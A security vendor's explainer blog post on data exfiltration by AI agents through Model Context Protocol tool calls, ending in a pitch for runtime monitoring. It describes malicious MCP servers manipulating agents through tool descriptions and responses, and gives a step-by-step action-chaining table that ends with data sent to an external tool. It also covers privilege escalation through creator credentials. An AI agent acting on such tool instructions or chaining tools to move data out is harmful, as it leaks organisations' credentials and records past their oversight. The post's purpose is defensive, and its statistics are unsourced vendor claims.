All ArticlesRuntime Truth
Runtime Truth
Threat Explainer

MCP Data Exfiltration: How AI Agents Leak Data Through Tool Calls

AI agents leak data through MCP tool calls at machine speed. Learn how action chaining and maker mode bypass IAM controls, and why runtime visibility is the only fix.

Obsidian Editorial Team
Security Research
·
Obsidian Security
·
May 18, 2026
May 28, 2026
Key Takeaways
  • AI agents move 16 times more data than human users.
  • Most security teams have no visibility into where that data goes.
  • That gap is not a configuration problem.
  • An agent connected to a Model Context Protocol (MCP) server can push data to external endpoints, unsanctioned destinations, and third-party services through ordinary tool calls.
  • None of that movement appears in a static configuration review.
  • None of it triggers a traditional DLP alert.

What MCP Is and Why It Creates an Exfiltration Surface

Security teams managing AI deployments face a question they cannot currently answer: what tools does each agent have access to, and what is the agent actually doing with them?

MCP, the Model Context Protocol, is an open standard that connects AI agents to external tools, data sources, and services. It acts as the integration layer between an agent's reasoning capability and the real-world systems it can act on. A growing share of enterprise AI deployments now connect to their tools and data through MCP, making it a dominant protocol for agentic connectivity.

The exfiltration surface emerges from a structural property of MCP's trust model. MCP verifies tool descriptions at connection time. It does not validate tool responses during execution. That means an agent operating through an MCP server connection can receive instructions from a tool, act on those instructions, and move data outward, all without any runtime check confirming that the destination is authorized.

The share of "action" tools in MCP usage, tools that write, send, or move data rather than just read, has risen as the ecosystem matures. More action tools mean more opportunities for data to move. More movement means a larger blast radius when something goes wrong.

The foundational problem is straightforward: the MCP connection exists in configuration. The data movement only exists at runtime. Understanding what AI agents are actually doing requires observing them while they operate, not reviewing how they were set up.

The MCP Data Exfiltration Mechanism: How Tool Calls Move Data

Security teams reviewing agent configurations see what an agent is authorized to do. They do not see what the agent is doing right now, or what it did three hours ago.

Here is the mechanism that creates MCP data exfiltration risk. An agent receives a task. It connects to an MCP server to execute that task. The MCP server exposes tools: functions the agent can call to retrieve data, write to systems, send messages, or interact with external APIs. The agent calls those tools in sequence. Each tool call can carry data as a parameter, as a payload, or as a response that gets forwarded to the next tool in the chain.

None of those individual tool calls require the agent to "know" it is moving data outward. The agent is executing its task. The data movement is a side effect of how the tool is configured or, in adversarial scenarios, how a malicious MCP server has been designed to manipulate the agent's behavior.

Malicious MCP servers can manipulate AI agents into surfacing sensitive information, including credentials and secrets, by exploiting the gap between what a tool claims to do and what it actually executes. The agent trusts the tool description. The tool description does not have to match the tool's behavior.

The result is a data movement event that:

  • Happens at machine speed, not human speed
  • Produces no alert in traditional DLP systems
  • Does not appear in SaaS audit logs as an unauthorized access event
  • Looks, from a configuration perspective, like normal agent operation

One enterprise discovered that an AI-powered coding assistant had been quietly moving credentials to an external endpoint for weeks before the activity was identified. The configuration showed an authorized MCP connection. The runtime showed a sustained leak. Stopping data movement threats early requires catching this activity before it compounds.

Action Chaining: How Limited Agents Reach Broad Data

Security teams assume that a low-privilege agent has a limited blast radius. Action chaining breaks that assumption.

Action chaining is the mechanism by which an agent sequences multiple tool calls across systems, compounding its access with each step. A limited-permission agent does not need direct access to sensitive data if it can call a tool that connects to a higher-permission MCP server, which in turn has access to that data.

The sequence looks like this:

StepAgent ActionData Exposure1Agent calls a file-retrieval toolAccesses document index2Tool response includes a reference to a connected data storeAgent now has a pathway to the store3Agent calls a data-export tool on the connected MCP serverRetrieves records from the broader store4Agent forwards output to an external notification toolData leaves the environment

Each individual step looks authorized. The chain, taken together, represents unauthorized data access and outbound movement. No single tool call triggers a policy violation. The violation is the sequence.

AI agent monitoring cannot rely on per-call inspection alone. Effective authority, what the agent can actually reach through its full tool-call graph, is always larger than theoretical configuration suggests. The blast radius of a chained agent is not the blast radius of its direct permissions. It is the blast radius of every tool it can reach.

Agents operating in maker mode compound this further. When an agent runs on the creator's embedded credentials, every tool call in the chain executes at the creator's privilege level, regardless of who invoked the agent. A user without Salesforce access can trigger an agent that, through action chaining across MCP tools, retrieves and exports CRM records the user was never authorized to see.

Obsidian maps the full tool-call graph for each agent in your environment, surfacing blast radius and action chaining across Salesforce Agentforce, Amazon Bedrock, Microsoft Copilot Studio, and other supported platforms, no per-SaaS connector required.

Why Configuration-Based Tools Miss MCP Data Exfiltration

Security teams doing their due diligence review agent configurations. They check OAuth scopes, review connector settings, and confirm that MCP servers are on an approved list. That work is necessary. It is not sufficient.

Configuration is not reality.

The tools inside an MCP server are only visible at runtime. A configuration review tells you that an MCP server is connected. It does not tell you which tools that server exposes, what those tools actually do when called, or where the data they handle goes. A large share of enterprise MCP connections operate without any runtime inspection layer between the agent and the tools it reaches.

This is the ghost chasing problem. Security teams review theoretical configuration signals: this MCP could be exploited, this connector exists, this scope is broad. They have no runtime evidence of what actually happened. They cannot answer the questions that matter: Was it used? Who triggered it? What data was accessed? Did it succeed?

Traditional security controls fail here for three specific reasons:

  • Network and endpoint tools cannot see AI agent tool calls across SaaS applications. The traffic looks like authorized API activity.
  • Native platform logs exist but are siloed per tenant, require manual correlation, and do not capture the cross-system data movement that action chaining produces.
  • Identity and access management controls govern what the agent is configured to access, not what it actually reached through a chained tool-call sequence.

The architecture gap in agent security is precisely this: the layer between agent configuration and agent runtime behavior has no owner in most enterprise security programs.

The Machine Insider Risk Hidden in Every MCP Connection

Every AI agent connected to an MCP server holds credentials. It holds tokens. It operates continuously, without the behavioral patterns that human insider risk programs use to detect anomalies. It is, in every functional sense, a machine insider.

Machine insider risk is the category that existing security programs do not cover. Insider risk programs are built around human behavior: unusual login times, large file downloads, access to systems outside a user's normal scope. AI agents violate every one of those assumptions. They operate at all hours. They move data at machine speed. They access systems across platforms in sequences that no human user would replicate.

The non-human identity problem compounds this. Agents inherit credentials from their creators, from OAuth grants, from hardcoded secrets in workflow configurations. Those credentials persist after the creator leaves the organization. Orphaned agents, agents whose owner accounts are disabled but whose MCP connections remain active, continue executing tool calls with inherited credentials. The blast radius of an orphaned agent connected to an MCP server with broad data access is not theoretical. It is active and ongoing.

One practical question every security team should be able to answer: how many active MCP connections in your environment belong to agents whose owners no longer work at the company? Most teams cannot answer that question. The answer is rarely zero.

Toxic combinations make this worse. An orphaned agent with an MCP connection to an unsanctioned external endpoint, running on maker mode credentials with admin-level access, represents a critical-severity risk from three compounding factors. Any one of those factors alone is medium severity. Together, they create the conditions for a sustained, undetected MCP data exfiltration event.

This is precisely the framing of OWASP's emerging guidance on agentic AI risks and aligns with the non-human identity threat categories recognized in NIST AI RMF governance controls.

Runtime Truth: What Effective Visibility Into MCP Tool Calls Looks Like

The solution to MCP data exfiltration is not a broader configuration review. It is runtime visibility into what agents are actually doing through their tool calls.

Runtime truth means observing every tool call an agent makes, correlating that call with the agent's identity, the invoker's identity, the destination of the data, and the effective authority the agent holds across every connected system. It means seeing the action chain, not just the individual step. It means knowing whether the data that moved was authorized to move, based on what the agent can actually access, not what its configuration says it should access.

Effective visibility into MCP tool-call data flows requires a single pane of glass across every agent platform, not a per-platform dashboard that requires manual correlation. It requires correlating agent configuration with actual SaaS entitlements, so that the effective authority of each agent is known before an incident occurs, not reconstructed afterward.

For security teams building toward AI agent governance, the operational requirements are:

  • MCP server inventory. Know every MCP server connected to every agent, sanctioned and unsanctioned, before reviewing tool-call behavior.
  • Tool-call visibility at runtime. See every tool an agent calls, every parameter it passes, and every destination it reaches, in real time.
  • Action chain correlation. Map multi-step tool sequences to understand the full blast radius of each agent's activity, not just its direct permissions.
  • Identity correlation. Connect the agent's runtime behavior to the invoker's identity and the maker's credentials, flagging privilege escalation when a user reaches data they should not be able to access.
  • Deterministic guardrails. Apply fixed, predictable enforcement rules to probabilistic agents. Detection without enforcement is expensive logging. Probabilistic agents require deterministic guardrails that cut off unauthorized action chains before they complete.

For any enterprise deploying MCP-connected agents, the evaluation should start with runtime visibility, not configuration review. Configuration tells you what was intended. Runtime tells you what happened.

Frequently Asked Questions

No items found.